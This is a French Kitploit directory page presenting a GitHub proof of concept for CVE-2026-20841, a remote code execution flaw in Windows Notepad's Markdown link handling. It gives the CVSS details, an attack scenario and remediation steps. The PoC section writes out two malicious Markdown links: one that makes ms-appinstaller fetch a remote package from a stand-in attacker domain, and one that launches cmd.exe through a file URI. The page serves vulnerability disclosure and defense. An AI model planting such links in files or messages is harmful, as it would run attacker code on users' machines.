Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20841-PoC — Preuve de concept démontrant une injection de commandes dans le Bloc-notes Windows via des liens Markdown spécialement conçus, permettant l'exécution de code à distance. Inclut les vecteurs d'attaque, les métriques CVSS et les recommandations de remédiation. | Kitploit
Outils/GitHubGitHub/dogukankurnaz/cve-2026-20841-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheApprentissage et Éducation
GitHubdogukankurnaz/cve-2026-20841-poc

CVE-2026-20841-PoC

Preuve de concept démontrant une injection de commandes dans le Bloc-notes Windows via des liens Markdown spécialement conçus, permettant l'exécution de code à distance. Inclut les vecteurs d'attaque, les métriques CVSS et les recommandations de remédiation.

Voir le dépôt
23il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-20841 - Vulnérabilité d'exécution de code à distance dans l'application Bloc-notes Windows

Présentation de la vulnérabilité

ChampDétail
Identifiant CVECVE-2026-20841
TitreVulnérabilité d'exécution de code à distance dans l'application Bloc-notes Windows
ImpactExécution de code à distance
Sévérité maximaleImportant
CVSS v3.1 Base / Temporel8.8 / 7.7
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
CWECWE-77 : Neutralisation incorrecte d'éléments spéciaux utilisés dans une commande (« Injection de commande »)
Produit concernéApplication Bloc-notes Windows (version Microsoft Store, builds antérieurs à 11.2510)
CNA assignéMicrosoft
Publié10 février 2026
Divulgué publiquementNon
ExploitéNon
Évaluation de l'exploitabilitéExploitation peu probable

Résumé exécutif

La neutralisation incorrecte d'éléments spéciaux utilisés dans une commande (« injection de commande ») dans l'application Bloc-notes Windows permet à un attaquant non autorisé d'exécuter du code sur un réseau.

L'application moderne Bloc-notes Windows (distribuée via Microsoft Store) a introduit la prise en charge du rendu Markdown, qui inclut des hyperliens cliquables. La vulnérabilité existe parce que le Bloc-notes ne parvient pas à valider et à assainir correctement les schémas d'URI dans les liens Markdown avant de les traiter. Un attaquant peut créer un fichier .md malveillant contenant des liens spécialement conçus qui, lorsqu'ils sont cliqués par l'utilisateur, déclenchent des gestionnaires de protocole non vérifiés pour charger et exécuter du contenu distant.

Métriques CVSS v3.1

Métriques de base

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction de l'utilisateurRequise
PortéeInchangée
Impact sur la confidentialitéÉlevé
Impact sur l'intégritéÉlevé
Impact sur la disponibilitéÉlevé

Métriques temporelles

MétriqueValeur
Maturité du code d'exploitationNon prouvée
Niveau de remédiationCorrectif officiel
Confiance du rapportConfirmée

FAQ

Comment un attaquant pourrait-il exploiter cette vulnérabilité ?

Un attaquant pourrait inciter un utilisateur à cliquer sur un lien malveillant dans un fichier Markdown ouvert dans le Bloc-notes, ce qui amènerait l'application à lancer des protocoles non vérifiés qui chargent et exécutent des fichiers distants.

Quel est le contexte cible de l'exécution de code à distance ?

Selon la métrique CVSS, le vecteur d'attaque est le réseau (AV:N) et l'interaction de l'utilisateur est requise (UI:R). Le code malveillant s'exécuterait dans le contexte de sécurité de l'utilisateur qui a ouvert le fichier Markdown, donnant à l'attaquant les mêmes autorisations que cet utilisateur.

Scénario d'attaque

  1. L'attaquant crée un fichier Markdown (.md) contenant des hyperliens malveillants.
  2. La victime ouvre le fichier dans la version vulnérable du Bloc-notes Windows.
  3. Le Bloc-notes rend le Markdown et affiche des liens cliquables.
  4. Lorsque la victime clique sur le lien, le Bloc-notes traite l'URI sans validation appropriée.
  5. Cela déclenche des gestionnaires de protocole (par exemple, ms-appinstaller://) qui peuvent récupérer et exécuter des charges utiles distantes, ou des URI file:// qui peuvent directement lancer des exécutables locaux.
  6. Le code malveillant s'exécute avec les mêmes privilèges que l'utilisateur connecté.

Preuve de concept

Avertissement : Cette preuve de concept est fournie strictement à des fins éducatives et de recherche en sécurité autorisée uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de test. L'accès non autorisé à des systèmes informatiques est illégal et puni par la loi.

La PoC démontre deux vecteurs d'attaque via des liens Markdown conçus :

Vecteur 1 - Installation de charge utile distante via l'abus d'un gestionnaire de protocole :

root@kitploit:~
[Cliquez pour voir le document](ms-appinstaller://?source=https://domaine-contrôlé-par-l-attaquant/malicious.appx)

Vecteur 2 - Invocation d'exécutable local via une URI de fichier :

root@kitploit:~
[Cliquez ici](file://C:/windows/system32/cmd.exe)

Démonstration

Démonstration de la PoC

Remédiation

  • Mettez à jour le Bloc-notes Windows vers la version 11.2510 ou ultérieure via le Microsoft Store.
  • Activez les mises à jour automatiques des applications dans Paramètres Windows > Applications > Microsoft Store.
  • N'ouvrez pas de fichiers .md provenant de sources non fiables dans le Bloc-notes.
  • Ne cliquez pas sur les liens dans les fichiers Markdown reçus par e-mail ou via des téléchargements non fiables.

Références

  • MSRC - CVE-2026-20841
  • NVD - CVE-2026-20841
  • CVE.org - CVE-2026-20841

Avertissement légal

Les informations fournies dans ce dépôt sont destinées uniquement à des fins éducatives et de recherche en sécurité autorisée. Cette preuve de concept est partagée pour aider les défenseurs à comprendre et à atténuer la vulnérabilité. L'auteur n'est pas responsable de toute utilisation abusive des informations ou des outils fournis ici. Obtenez toujours une autorisation écrite appropriée avant de tester les vulnérabilités d'un système. L'accès non autorisé à des systèmes informatiques est une infraction pénale dans la plupart des juridictions. Utilisez de manière responsable et éthique.

Télécharger l’outil